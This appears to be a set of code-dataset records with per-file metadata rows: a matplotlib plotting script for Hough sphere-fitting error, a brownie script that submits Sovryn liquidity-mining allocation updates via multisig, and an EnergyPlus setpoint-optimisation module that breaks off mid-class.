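The reductions above collapse the 5-D results array over the iteration axis (0) and the ground-truth-size axis (3), leaving a `(outliers, occlusions, noise_levels)` grid of means and standard deviations. A small self-contained sketch of the same `axis=(0, 3)` reduction on toy data:

```python
import numpy as np

# toy stand-in for the reshaped results:
# (iterations, outlier_levels, occlusion_levels, ground_truth_size, noise_levels)
results = np.arange(2 * 1 * 1 * 1 * 3, dtype=float).reshape(2, 1, 1, 1, 3)

mean = np.mean(results, axis=(0, 3))  # average over iterations and radii
std = np.std(results, axis=(0, 3))

print(mean.shape)  # (1, 1, 3): one value per noise level for each (outlier, occlusion) pair
```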
### Plots (noise)
### Position
plt.figure(figsize=(8, 6))
plt.plot(error_levels,hough_position_results_mean_0[outlier_index,occlusion_index,:],color=colors[0],label=labels[0],linestyle=linestyles[1])
error_sup=hough_position_results_mean_0[outlier_index,occlusion_index,:]+hough_position_results_std_0[outlier_index,occlusion_index,:];
error_inf=hough_position_results_mean_0[outlier_index,occlusion_index,:]-hough_position_results_std_0[outlier_index,occlusion_index,:];
plt.fill_between(error_levels,error_sup,error_inf,where=error_inf<=error_sup,interpolate=True,alpha=alpha_,color=colors[0])
plt.plot(error_levels,hough_position_results_mean_1[outlier_index,occlusion_index,:],color=colors[0],label=labels[1],linestyle=linestyles[0])
error_sup=hough_position_results_mean_1[outlier_index,occlusion_index,:]+hough_position_results_std_1[outlier_index,occlusion_index,:];
error_inf=hough_position_results_mean_1[outlier_index,occlusion_index,:]-hough_position_results_std_1[outlier_index,occlusion_index,:];
plt.fill_between(error_levels,error_sup,error_inf,where=error_inf<=error_sup,interpolate=True,alpha=alpha_,color=colors[0])
manager = plt.get_current_fig_manager()
manager.resize(*manager.window.maxsize())
plt.xlabel('noise standard deviation [% of sphere radius]',fontsize=fontsize_)
plt.ylabel('absolute position error [m]',fontsize=fontsize_)
plt.xticks(color='k', size=fontsize_)
plt.yticks(color='k', size=fontsize_)
#plt.show()
plt.legend(fontsize=fontsize_)
plt.savefig('noise_position_error.pdf',format='pdf')
### Radius
plt.figure(figsize=(8, 6))
plt.plot(error_levels,hough_radius_results_mean_0[outlier_index,occlusion_index,:],color=colors[0],label=labels[0],linestyle=linestyles[1])
error_sup=hough_radius_results_mean_0[outlier_index,occlusion_index,:]+hough_radius_results_std_0[outlier_index,occlusion_index,:];
error_inf=hough_radius_results_mean_0[outlier_index,occlusion_index,:]-hough_radius_results_std_0[outlier_index,occlusion_index,:];
plt.fill_between(error_levels,error_sup,error_inf,where=error_inf<=error_sup,interpolate=True,alpha=alpha_,color=colors[0])
plt.plot(error_levels,hough_radius_results_mean_1[outlier_index,occlusion_index,:],color=colors[0],label=labels[1],linestyle=linestyles[0])
error_sup=hough_radius_results_mean_1[outlier_index,occlusion_index,:]+hough_radius_results_std_1[outlier_index,occlusion_index,:];
error_inf=hough_radius_results_mean_1[outlier_index,occlusion_index,:]-hough_radius_results_std_1[outlier_index,occlusion_index,:];
plt.fill_between(error_levels,error_sup,error_inf,where=error_inf<=error_sup,interpolate=True,alpha=alpha_,color=colors[0])
manager = plt.get_current_fig_manager()
manager.resize(*manager.window.maxsize())
plt.xlabel('noise standard deviation [% of sphere radius]',fontsize=fontsize_)
plt.ylabel('absolute radius error [m]',fontsize=fontsize_)
plt.xticks(color='k', size=fontsize_)
plt.yticks(color='k', size=fontsize_)
#plt.show()
plt.savefig('noise_radius_error.pdf',format='pdf')
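Each curve in the plots above is drawn with a shaded ±1 standard-deviation band via `fill_between`. A self-contained miniature of the same mean-plus-band pattern (all data here is synthetic):

```python
import matplotlib
matplotlib.use('Agg')  # render off-screen
import matplotlib.pyplot as plt
import numpy as np

levels = np.array([0, 5, 10, 15, 20])
mean = 0.01 * levels   # synthetic mean error per noise level
std = 0.002 * levels   # synthetic standard deviation

fig, ax = plt.subplots(figsize=(8, 6))
ax.plot(levels, mean, color='green', label='Ours (Unbiased)', linestyle='--')
# shade the region between mean - std and mean + std
ax.fill_between(levels, mean + std, mean - std,
                where=(mean - std) <= (mean + std),
                interpolate=True, alpha=0.1, color='green')
ax.legend()
fig.savefig('band_demo.pdf', format='pdf')
```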
### Plots (outliers)
### Position
plt.figure(figsize=(8, 6))
plt.plot(outlier_levels_,hough_position_results_mean_0[:,occlusion_index,noise_index],color=colors[0],label=labels[0],linestyle=linestyles[1])
error_sup=hough_position_results_mean_0[:,occlusion_index,noise_index]+hough_position_results_std_0[:,occlusion_index,noise_index];
error_inf=hough_position_results_mean_0[:,occlusion_index,noise_index]-hough_position_results_std_0[:,occlusion_index,noise_index];
plt.fill_between(outlier_levels_,error_sup,error_inf,where=error_inf<=error_sup,interpolate=True,alpha=alpha_,color=colors[0])
plt.plot(outlier_levels_,hough_position_results_mean_1[:,occlusion_index,noise_index],color=colors[0],label=labels[1],linestyle=linestyles[0])
error_sup=hough_position_results_mean_1[:,occlusion_index,noise_index]+hough_position_results_std_1[:,occlusion_index,noise_index];
error_inf=hough_position_results_mean_1[:,occlusion_index,noise_index]-hough_position_results_std_1[:,occlusion_index,noise_index];
plt.fill_between(outlier_levels_,error_sup,error_inf,where=error_inf<=error_sup,interpolate=True,alpha=alpha_,color=colors[0])
manager = plt.get_current_fig_manager()
manager.resize(*manager.window.maxsize())
plt.xlabel('outliers [% of sphere surface points]',fontsize=fontsize_)
plt.ylabel('absolute position error [m]',fontsize=fontsize_)
plt.xticks(color='k', size=fontsize_)
plt.yticks(color='k', size=fontsize_)
plt.legend(fontsize=fontsize_)
plt.savefig('outliers_position_error.pdf',format='pdf')
### Radius
plt.figure(figsize=(8, 6))
plt.plot(outlier_levels_,hough_radius_results_mean_0[:,occlusion_index,noise_index],color=colors[0],label=labels[0],linestyle=linestyles[1])
error_sup=hough_radius_results_mean_0[:,occlusion_index,noise_index]+hough_radius_results_std_0[:,occlusion_index,noise_index];
error_inf=hough_radius_results_mean_0[:,occlusion_index,noise_index]-hough_radius_results_std_0[:,occlusion_index,noise_index];
plt.fill_between(outlier_levels_,error_sup,error_inf,where=error_inf<=error_sup,interpolate=True,alpha=alpha_,color=colors[0])
manager = plt.get_current_fig_manager()
manager.resize(*manager.window.maxsize())
plt.xlabel('outliers [% of sphere surface points]',fontsize=fontsize_)
plt.ylabel('absolute radius error [m]',fontsize=fontsize_)
plt.xticks(color='k', size=fontsize_)
plt.yticks(color='k', size=fontsize_)
plt.legend(fontsize=fontsize_)
plt.savefig('outliers_radius_error.pdf',format='pdf')
### Plots (occlusion)
### Position
plt.figure(figsize=(8, 6))
plt.plot(occlusion_levels_,hough_position_results_mean_0[outlier_index,:,noise_index],color=colors[0],label=labels[0])
error_sup=hough_position_results_mean_0[outlier_index,:,noise_index]+hough_position_results_std_0[outlier_index,:,noise_index];
error_inf=hough_position_results_mean_0[outlier_index,:,noise_index]-hough_position_results_std_0[outlier_index,:,noise_index];
plt.fill_between(occlusion_levels_,error_sup,error_inf,where=error_inf<=error_sup,interpolate=True,alpha=alpha_,color=colors[0])
manager = plt.get_current_fig_manager()
manager.resize(*manager.window.maxsize())
plt.xlabel('occlusion [% of sphere surface points]',fontsize=fontsize_)
plt.ylabel('absolute position error [m]',fontsize=fontsize_)
plt.xticks(color='k', size=fontsize_)
plt.yticks(color='k', size=fontsize_)
plt.legend(fontsize=fontsize_)
plt.savefig('occlusion_position_error.pdf',format='pdf')
### Radius
plt.figure(figsize=(8, 6))
plt.plot(occlusion_levels_,hough_radius_results_mean_0[outlier_index,:,noise_index],color=colors[0],label=labels[0])
error_sup=hough_radius_results_mean_0[outlier_index,:,noise_index]+hough_radius_results_std_0[outlier_index,:,noise_index];
error_inf=hough_radius_results_mean_0[outlier_index,:,noise_index]-hough_radius_results_std_0[outlier_index,:,noise_index];
plt.fill_between(occlusion_levels_,error_sup,error_inf,where=error_inf<=error_sup,interpolate=True,alpha=alpha_,color=colors[0])
manager = plt.get_current_fig_manager()
manager.resize(*manager.window.maxsize())
plt.xlabel('occlusion [% of sphere surface points]',fontsize=fontsize_)
plt.ylabel('absolute radius error [m]',fontsize=fontsize_)
plt.xticks(color='k', size=fontsize_)
plt.yticks(color='k', size=fontsize_)
plt.legend(fontsize=fontsize_)
plt.savefig('occlusion_radius_error.pdf',format='pdf')
plt.show()
| 46.743902 | 208 | 0.814419 | 1,761 | 11,499 | 4.961386 | 0.128904 | 0.059174 | 0.088589 | 0.059517 | 0.816527 | 0.783221 | 0.739499 | 0.721873 | 0.714776 | 0.680783 | 0 | 0.021412 | 0.057744 | 11,499 | 245 | 209 | 46.934694 | 0.784956 | 0.096182 | 0 | 0.379085 | 0 | 0 | 0.102023 | 0.039977 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006536 | false | 0 | 0.03268 | 0 | 0.052288 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ee5f80a2b7b1a955e1a677bde04a9cee64029dc5 | 4,187 | py | Python | scripts/deployment/liquidity-mining/addETHPoolToken.py | spiyer99/Sovryn-smart-contracts | f0d5059f0e71096801683f3fe310d262b27c5997 | [
"Apache-2.0"
] | 1 | 2021-06-07T17:12:56.000Z | 2021-06-07T17:12:56.000Z | scripts/deployment/liquidity-mining/addETHPoolToken.py | 1Crazymoney/Sovryn-smart-contracts | 308e7a82f857a8dbb0f7e789717de33be08189ec | [
"Apache-2.0"
] | null | null | null | scripts/deployment/liquidity-mining/addETHPoolToken.py | 1Crazymoney/Sovryn-smart-contracts | 308e7a82f857a8dbb0f7e789717de33be08189ec | [
"Apache-2.0"
] | null | null | null |
'''
This script serves the purpose of interacting with existing smart contracts on the testnet or mainnet.
'''
from brownie import *
from brownie.network.contract import InterfaceContainer
import json
import time
import copy
def main():
    # load the contracts and acct depending on the network
    loadConfig()
    # call the function you want here
    # addTestETHPoolToken()
    # addETHPoolToken()
    updatePoolToken()
def loadConfig():
    global contracts, acct
    thisNetwork = network.show_active()
    if thisNetwork == "development":
        acct = accounts[0]
        configFile = open('./scripts/contractInteraction/testnet_contracts.json')
    elif thisNetwork == "testnet":
        acct = accounts.load("rskdeployer")
        configFile = open('./scripts/contractInteraction/testnet_contracts.json')
    elif thisNetwork == "rsk-testnet":
        acct = accounts.load("rskdeployer")
        configFile = open('./scripts/contractInteraction/testnet_contracts.json')
    elif thisNetwork == "rsk-mainnet":
        acct = accounts.load("rskdeployer")
        configFile = open('./scripts/contractInteraction/mainnet_contracts.json')
    else:
        raise Exception("Network not supported.")
    contracts = json.load(configFile)
def addTestETHPoolToken():
    multisig = Contract.from_abi("MultiSig", address=contracts['multisig'], abi=MultiSigWallet.abi, owner=acct)
    lm = Contract.from_abi("LiquidityMining", address=contracts['LiquidityMiningProxy'], abi=LiquidityMining.abi, owner=acct)
    data = lm.add.encode_input(contracts['(WR)BTC/ETH'], 1, False)
    tx = multisig.submitTransaction(lm.address, 0, data)
    txId = tx.events["Submission"]["transactionId"]
    print("txid", txId)
def addETHPoolToken():
    multisig = Contract.from_abi("MultiSig", address=contracts['multisig'], abi=MultiSigWallet.abi, owner=acct)
    lm = Contract.from_abi("LiquidityMining", address=contracts['LiquidityMiningProxy'], abi=LiquidityMining.abi, owner=acct)
    MAX_ALLOCATION_POINT = 100000 * 1000  # 100 M
    ALLOCATION_POINT_BTC_SOV = 40000  # (WR)BTC/SOV
    ALLOCATION_POINT_BTC_ETH = 1  # or 30000 (WR)BTC/ETH
    ALLOCATION_POINT_DEFAULT = 1  # (WR)BTC/USDT1 | (WR)BTC/USDT2 | (WR)BTC/DOC1 | (WR)BTC/DOC2 | (WR)BTC/BPRO1 | (WR)BTC/BPRO2
    ALLOCATION_POINT_CONFIG_TOKEN = MAX_ALLOCATION_POINT - ALLOCATION_POINT_BTC_SOV - ALLOCATION_POINT_BTC_ETH - ALLOCATION_POINT_DEFAULT * 6
    print("ALLOCATION_POINT_CONFIG_TOKEN: ", ALLOCATION_POINT_CONFIG_TOKEN)
    data = lm.add.encode_input(contracts['(WR)BTC/ETH'], ALLOCATION_POINT_BTC_ETH, False)
    tx = multisig.submitTransaction(lm.address, 0, data)
    txId = tx.events["Submission"]["transactionId"]
    print("txid", txId)
    data = lm.update.encode_input(contracts['LiquidityMiningConfigToken'], ALLOCATION_POINT_CONFIG_TOKEN, True)
    tx = multisig.submitTransaction(lm.address, 0, data)
    txId = tx.events["Submission"]["transactionId"]
    print("txid", txId)
def updatePoolToken():
    multisig = Contract.from_abi("MultiSig", address=contracts['multisig'], abi=MultiSigWallet.abi, owner=acct)
    lm = Contract.from_abi("LiquidityMining", address=contracts['LiquidityMiningProxy'], abi=LiquidityMining.abi, owner=acct)
    MAX_ALLOCATION_POINT = 100000 * 1000  # 100 M
    ALLOCATION_POINT_BTC_SOV = 30000  # (WR)BTC/SOV
    ALLOCATION_POINT_BTC_ETH = 35000  # (WR)BTC/ETH
    ALLOCATION_POINT_DEFAULT = 1  # (WR)BTC/USDT1 | (WR)BTC/USDT2 | (WR)BTC/DOC1 | (WR)BTC/DOC2 | (WR)BTC/BPRO1 | (WR)BTC/BPRO2
    ALLOCATION_POINT_CONFIG_TOKEN = MAX_ALLOCATION_POINT - ALLOCATION_POINT_BTC_SOV - ALLOCATION_POINT_BTC_ETH - ALLOCATION_POINT_DEFAULT * 6
    print("ALLOCATION_POINT_CONFIG_TOKEN: ", ALLOCATION_POINT_CONFIG_TOKEN)
    data = lm.update.encode_input(contracts['(WR)BTC/SOV'], ALLOCATION_POINT_BTC_SOV, False)
    tx = multisig.submitTransaction(lm.address, 0, data)
    txId = tx.events["Submission"]["transactionId"]
    print("txid", txId)
    data = lm.update.encode_input(contracts['LiquidityMiningConfigToken'], ALLOCATION_POINT_CONFIG_TOKEN, True)
    tx = multisig.submitTransaction(lm.address, 0, data)
    txId = tx.events["Submission"]["transactionId"]
    print("txid", txId)
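Both `addETHPoolToken` and `updatePoolToken` derive the config-token allocation so that all pool allocation points sum to `MAX_ALLOCATION_POINT`. The arithmetic on its own, with the constants copied from `updatePoolToken`:

```python
MAX_ALLOCATION_POINT = 100000 * 1000  # 100 M total
ALLOCATION_POINT_BTC_SOV = 30000      # (WR)BTC/SOV
ALLOCATION_POINT_BTC_ETH = 35000      # (WR)BTC/ETH
ALLOCATION_POINT_DEFAULT = 1          # six remaining pools at 1 point each

# the config token absorbs the remainder so the total stays at 100 M
ALLOCATION_POINT_CONFIG_TOKEN = (MAX_ALLOCATION_POINT
                                 - ALLOCATION_POINT_BTC_SOV
                                 - ALLOCATION_POINT_BTC_ETH
                                 - ALLOCATION_POINT_DEFAULT * 6)

total = (ALLOCATION_POINT_BTC_SOV + ALLOCATION_POINT_BTC_ETH
         + ALLOCATION_POINT_DEFAULT * 6 + ALLOCATION_POINT_CONFIG_TOKEN)
print(ALLOCATION_POINT_CONFIG_TOKEN)  # 99934994
```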
| 44.542553 | 141 | 0.729162 | 498 | 4,187 | 5.957831 | 0.214859 | 0.131446 | 0.060667 | 0.070104 | 0.800472 | 0.795416 | 0.77789 | 0.758342 | 0.73576 | 0.687563 | 0 | 0.019646 | 0.149033 | 4,187 | 93 | 142 | 45.021505 | 0.813079 | 0.114402 | 0 | 0.552239 | 0 | 0 | 0.200108 | 0.086768 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074627 | false | 0 | 0.074627 | 0 | 0.149254 | 0.104478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ee6160f62e8f157321dea49505c25b6606d7b0cb | 44,090 | py | Python | Chapter4/Python Code/SOProblems_OT.py | kadenP/TheRoleOfBuildingsInAChangingEnvironmentalEra_PleweMSThesis | e8a8420f51d852ad48125d600c1527e923f0a4e7 | [
"MIT"
] | null | null | null | Chapter4/Python Code/SOProblems_OT.py | kadenP/TheRoleOfBuildingsInAChangingEnvironmentalEra_PleweMSThesis | e8a8420f51d852ad48125d600c1527e923f0a4e7 | [
"MIT"
] | null | null | null | Chapter4/Python Code/SOProblems_OT.py | kadenP/TheRoleOfBuildingsInAChangingEnvironmentalEra_PleweMSThesis | e8a8420f51d852ad48125d600c1527e923f0a4e7 | [
"MIT"
] | null | null | null | '''
Kaden Plewe
3/5/2019
Optimization Model for SEB Single Thermal Zone Building
This will define an optimization problem based on the small office EnergyPlus model. It will be passed into
the optimization algorithm directly.
idf location: C:\Users\Owner\OneDrive\Research\Masters Thesis\Open Studio\Building Models
idd location: C:\EnergyPlusV8-5-0\Energy+.idd
eppy location: C:\Users\Owner\Anaconda3\Lib\site-packages\eppy
'''
'''import libraries'''
from SmallOfficeModules import configuresmalloffice, smallofficeoutputs
from eppy.modeleditor import IDF
import eppy.json_functions as json_functions
import os
import json
import csv
from collections import defaultdict
import numpy as np
from platypus import Problem, Real
import random
# OptCS = "global"; OptCS = []; OptHS = "global"; OptHS = []
'''parameter set used to apply uncertainty'''
# with open('jsonOUTPUT_PMVOpt10.txt') as jsonParams:
# paramSet = json.load(jsonParams)
paramSet = {'input': []}
'''optimization problem for hour 1 of 24'''
class SO1(Problem):
    def __init__(self, Begin_Month, Begin_Day_of_Month, End_Month, End_Day_of_Month):
        '''define the SEB problem as having 48 decision variables (space thermostat CLG and HTG setpoints),
        3 objectives (HVAC demand, PMV and setpoint-change cost) and 48 constraints (PMV values)'''
        super(SO1, self).__init__(48, 3, 48)
        '''define the decision variables as real values with limited ranges:
        48 total variables, 24 hourly cooling setpoints followed by 24 hourly heating setpoints'''
        self.types[:] = ([Real(23.5, 30) for _ in range(24)] +
                         [Real(15.5, 23) for _ in range(24)])
        '''define the types of constraints that will be used in the problem definition'''
        self.constraints[:] = "<=0"
        '''introduce the necessary files for the building simulation'''
        self.iddfile = r"C:\EnergyPlusV8-5-0\Energy+.idd"
        self.fname = "SmallOffice.idf"
        self.weatherfile = "USA_MI_Lansing-Capital.City.AP.725390_TMY3.epw"
        '''initialize idf file'''
        IDF.setiddname(self.iddfile)
        self.idfdevice = IDF(self.fname, self.weatherfile)
        '''initialize idf file for specified outputs and simulation period'''
        '''update the run period fields'''
        for obj in self.idfdevice.idfobjects['RUNPERIOD']:
            obj.Begin_Month = Begin_Month
            obj.Begin_Day_of_Month = Begin_Day_of_Month
            obj.End_Month = End_Month
            obj.End_Day_of_Month = End_Day_of_Month
        '''update the simulation control variables'''
        for obj in self.idfdevice.idfobjects['SIMULATIONCONTROL']:
            obj.Do_Zone_Sizing_Calculation = 'Yes'
            obj.Do_System_Sizing_Calculation = 'Yes'
            obj.Do_Plant_Sizing_Calculation = 'Yes'
            obj.Run_Simulation_for_Sizing_Periods = 'No'
            obj.Run_Simulation_for_Weather_File_Run_Periods = 'Yes'
        print('=== Simulation Control Parameters Changed ===')
        '''add thermal comfort model to people objects'''
        for obj in self.idfdevice.idfobjects['PEOPLE']:
            obj.Surface_NameAngle_Factor_List_Name = ''
            obj.Work_Efficiency_Schedule_Name = 'WORK_EFF_SCH'
            obj.Clothing_Insulation_Schedule_Name = 'CLOTHING_SCH'
            obj.Air_Velocity_Schedule_Name = 'AIR_VELO_SCH'
            obj.Thermal_Comfort_Model_1_Type = 'Fanger'
        '''request hourly output variables: Fanger PMV and PPD (zone average), purchased electric
        energy [J], total HVAC demand [W], cooling/heating setpoints [°C] and zone air temperature [°C]'''
        hourly_outputs = ['Zone Thermal Comfort Fanger Model PMV',
                          'Zone Thermal Comfort Fanger Model PPD',
                          'Facility Total Purchased Electric Energy',
                          'Facility Total HVAC Electric Demand Power',
                          'Zone Thermostat Cooling Setpoint Temperature',
                          'Zone Thermostat Heating Setpoint Temperature',
                          'Zone Thermostat Air Temperature']
        for name in hourly_outputs:
            out = self.idfdevice.newidfobject('OUTPUT:VARIABLE')
            out.Variable_Name = name
            out.Reporting_Frequency = 'Hourly'
    def evaluate(self, solution):
        '''split the decision vector: first 24 are hourly cooling setpoints, last 24 hourly heating setpoints'''
        self.CSP = list(solution.variables[0:24])
        self.HSP = list(solution.variables[24:48])
        self.results = buildingSim(self.idfdevice, self.CSP, self.HSP)
        print('=== hvacPower_ave = %f ===' % self.results.hvacPower_ave)
        print('=== allPMV_max = %f ===' % self.results.allPMV_max)
        print('=== allPMV_min = %f ===' % self.results.allPMV_min)
        '''matrices that extract and weight pmv values for working hours'''
        pmvI = np.identity(48)
        pmvA = np.identity(48)*5
        # offHours = [0, 1, 2, 3, 4, 5, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37,
        #             38, 39, 40, 41, 42, 43, 44, 45, 46, 47]
        offHours = [0, 1, 2, 3, 4, 5, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 42, 43, 44, 45, 46, 47]
        # offHours = [0, 1, 2, 3, 4, 5, 18, 19, 20, 21, 22, 23]
        for i in offHours:
            pmvI[i, i] = 0
            pmvA[i, i] = 0
        '''matrix for hvac power weight'''
        hvacA = np.identity(48)*0.0000001
        '''superdiagonal matrix for the setpoint-change (derivative) cost; the zero at index 23
        breaks the chain between the cooling and heating blocks'''
        diagonal = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0,
                             1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
        D = np.diag(diagonal, 1)
        setpoints = np.array(self.CSP + self.HSP)
        '''matrix for the setpoint-change cost'''
        constDownA = np.identity(48)*0.05
        constrainDown = setpoints.T - D@setpoints.T
        print(constrainDown)
        print('objective 1: %f' % (self.results.hvacPower[0:48]@hvacA@self.results.hvacPower[0:48].T))
        print('objective 2: %f' % (self.results.allPMV_mean1[0, 0:48]@pmvA@self.results.allPMV_mean1[0, 0:48].T))
        print('objective 3: %f' % (constrainDown@constDownA@constrainDown.T))
        '''hvac power demand, predicted mean vote and setpoint-change objective functions'''
        solution.objectives[0] = np.sqrt(self.results.hvacPower[0:48]@hvacA@self.results.hvacPower[0:48].T)
        solution.objectives[1] = np.sqrt(self.results.allPMV_mean1[0, 0:48]@pmvA@self.results.allPMV_mean1[0, 0:48].T)
        solution.objectives[2] = np.sqrt(constrainDown@constDownA@constrainDown.T)
        '''thermal comfort constraints'''
        solution.constraints[:] = abs(pmvI@self.results.allPMV_mean1[0, 0:48].T) - 1
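The setpoint-change cost in `SO1.evaluate` builds a superdiagonal matrix `D` so that `setpoints - D @ setpoints` yields hour-to-hour differences, with a zero placed on the superdiagonal where the cooling block ends so the cooling/heating boundary is not coupled. A reduced 4-variable sketch of the same construction:

```python
import numpy as np

setpoints = np.array([24.0, 25.0, 26.0, 20.0])

# superdiagonal mask: 1 couples consecutive entries, 0 breaks the chain
diagonal = np.array([1, 1, 0])
D = np.diag(diagonal, 1)

delta = setpoints - D @ setpoints
# delta[i] = setpoints[i] - setpoints[i+1] where diagonal[i] == 1;
# where the chain is broken (and at the last entry) delta[i] is just setpoints[i]
print(delta)  # [-1. -1. 26. 20.]
```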
'''optimization problem for a single set point temperature (for simplicity)'''
class SO2(Problem):
def __init__(self, Begin_Month, Begin_Day_of_Month, End_Month, End_Day_of_Month):
'''define SEB problem as having 2 decision variables (Space Thermostat HTG and CLG Setpoint), 2 objective
(HVAC Demand + PMV) and 48 constraints (PMV values and derivatives)'''
super(SO2, self).__init__(2, 2, 48)
'''define the two decision variables as real values with limited ranges
30 total variables for heating and cooling setpoints for a 24 hour period'''
self.types[:] = [Real(23.5, 30), Real(15.5, 23)]
'''define the types of constraints that will be used in the problem definition'''
self.constraints[:] = "<=0"
'''introduce the necessary files for the building simulation'''
self.iddfile = "C:\EnergyPlusV8-5-0\Energy+.idd"
self.fname = "SmallOffice.idf"
self.weatherfile = "USA_MI_Lansing-Capital.City.AP.725390_TMY3.epw"
'''initialize idf file'''
IDF.setiddname(self.iddfile)
self.idfdevice = IDF(self.fname, self.weatherfile)
'''initialize idf file for specified outputs and simulation period'''
'''update the run period fields'''
for object in self.idfdevice.idfobjects['RUNPERIOD']:
object.Begin_Month = Begin_Month
object.Begin_Day_of_Month = Begin_Day_of_Month
object.End_Month = End_Month
object.End_Day_of_Month = End_Day_of_Month
'''update the simulation control variables'''
for object in self.idfdevice.idfobjects['SIMULATIONCONTROL']:
object.Do_Zone_Sizing_Calculation = 'Yes'
object.Do_System_Sizing_Calculation = 'Yes'
object.Do_Plant_Sizing_Calculation = 'Yes'
object.Run_Simulation_for_Sizing_Periods = 'No'
object.Run_Simulation_for_Weather_File_Run_Periods = 'Yes'
print('=== Sumulation Control Parameters Changed ===')
'''add thermal comfort model to people objects'''
for object in self.idfdevice.idfobjects['PEOPLE']:
object.Surface_NameAngle_Factor_List_Name = ''
object.Work_Efficiency_Schedule_Name = 'WORK_EFF_SCH'
object.Clothing_Insulation_Schedule_Name = 'CLOTHING_SCH'
object.Air_Velocity_Schedule_Name = 'AIR_VELO_SCH'
object.Thermal_Comfort_Model_1_Type = 'Fanger'
'''hourly report variables: Fanger PMV and PPD (zone average), total purchased electric
energy [J], total HVAC electric demand [W], cooling and heating setpoints [C],
and zone thermostat air temperature [C]'''
report_variables = [
    'Zone Thermal Comfort Fanger Model PMV',
    'Zone Thermal Comfort Fanger Model PPD',
    'Facility Total Purchased Electric Energy',
    'Facility Total HVAC Electric Demand Power',
    'Zone Thermostat Cooling Setpoint Temperature',
    'Zone Thermostat Heating Setpoint Temperature',
    'Zone Thermostat Air Temperature',
]
for variable_name in report_variables:
    self.idfdevice.newidfobject('OUTPUT:VARIABLE',
                                Variable_Name=variable_name,
                                Reporting_Frequency='Hourly')
def evaluate(self, solution):
self.CSP1 = solution.variables[0]
self.HSP1 = solution.variables[1]
self.results = buildingSim(self.idfdevice, [self.CSP1],
[self.HSP1])
print('=== hvacPower_ave = %f ===' % self.results.hvacPower_ave)
print('=== allPMV_max = %f ===' % self.results.allPMV_max)
print('=== allPMV_min = %f ===' % self.results.allPMV_min)
'''matrix that extracts pmv values for working hours'''
pmvI = np.identity(48)
pmvA = np.identity(48)*5
# offHours = [0, 1, 2, 3, 4, 5, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37,
# 38, 39, 40, 41, 42, 43, 44, 45, 46, 47]
offHours = [0, 1, 2, 3, 4, 5, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 42, 43, 44, 45, 46, 47]
# offHours = [0, 1, 2, 3, 4, 5, 18, 19, 20, 21, 22, 23]
for i in offHours:
pmvI[i, i] = 0
pmvA[i, i] = 0
'''matrix for hvac power weight'''
hvacA = np.identity(48)*0.0000001
'''matrix for applying derivative constraint'''
# diagonal = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0,
# 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
# D = np.diag(diagonal, 1)
# setpoints = np.array([self.CSP1,
# self.HSP1])
'''matrix for changing setpoint downwards cost'''
# constDownA = np.identity(48)*0.05
# constrainDown = setpoints.T - D@setpoints.T
# print(constrainDown)
print('objective 1: %f' % (self.results.hvacPower[0:48]@hvacA@self.results.hvacPower[0:48].T))
print('objective 2: %f' % (self.results.allPMV_mean1[0, 0:48]@pmvA@self.results.allPMV_mean1[0, 0:48].T))
# print('objective 3: %f' % (constrainDown@constDownA@constrainDown.T))
'''hvac power demand and predicted mean vote objective function'''
solution.objectives[0] = np.sqrt((self.results.hvacPower[0:48]@hvacA@self.results.hvacPower[0:48].T))
solution.objectives[1] = np.sqrt((self.results.allPMV_mean1[0, 0:48]@pmvA@self.results.allPMV_mean1[0, 0:48].T))
# solution.objectives[2] = np.sqrt((constrainDown@constDownA@constrainDown.T))
'''thermal comfort constraints'''
solution.constraints[:] = abs(pmvI@self.results.allPMV_mean1[0, 0:48].T) - 1
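The objectives above are weighted quadratic forms `sqrt(x @ A @ x.T)` in which a diagonal matrix zeroes out unoccupied hours, so only working-hour discomfort contributes. A minimal standalone sketch of that masking, using hypothetical PMV data and only numpy:

```python
import numpy as np

# Hypothetical hourly PMV trace over the 48-hour horizon.
pmv = np.linspace(-1.5, 1.5, 48)

# Diagonal weight matrix: 5.0 during occupied hours, 0.0 otherwise,
# mirroring pmvA and offHours in evaluate() above.
off_hours = [0, 1, 2, 3, 4, 5, 18, 19, 20, 21, 22, 23,
             24, 25, 26, 27, 28, 29, 42, 43, 44, 45, 46, 47]
pmv_weights = np.identity(48) * 5.0
pmv_weights[off_hours, off_hours] = 0.0

# Weighted quadratic objective: only occupied hours contribute.
objective = np.sqrt(pmv @ pmv_weights @ pmv.T)

# Equivalent elementwise form, useful as a sanity check.
mask = np.diag(pmv_weights) > 0
assert np.isclose(objective, np.sqrt(np.sum(5.0 * pmv[mask] ** 2)))
```

The same idea with an identity-valued diagonal (`pmvI`) yields the per-hour comfort constraint `|PMV| <= 1` restricted to occupied hours.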
class buildingSim:
def __init__(self, idfdevice, CLG_SETPOINT, HTG_SETPOINT):
'''update setpoints and run energyplus simulation'''
'''append setpoints from optimizer to the optimized list'''
# OptCS[(24 - len(CLG_SETPOINT)):] = CLG_SETPOINT
# OptHS[(24 - len(HTG_SETPOINT)):] = HTG_SETPOINT
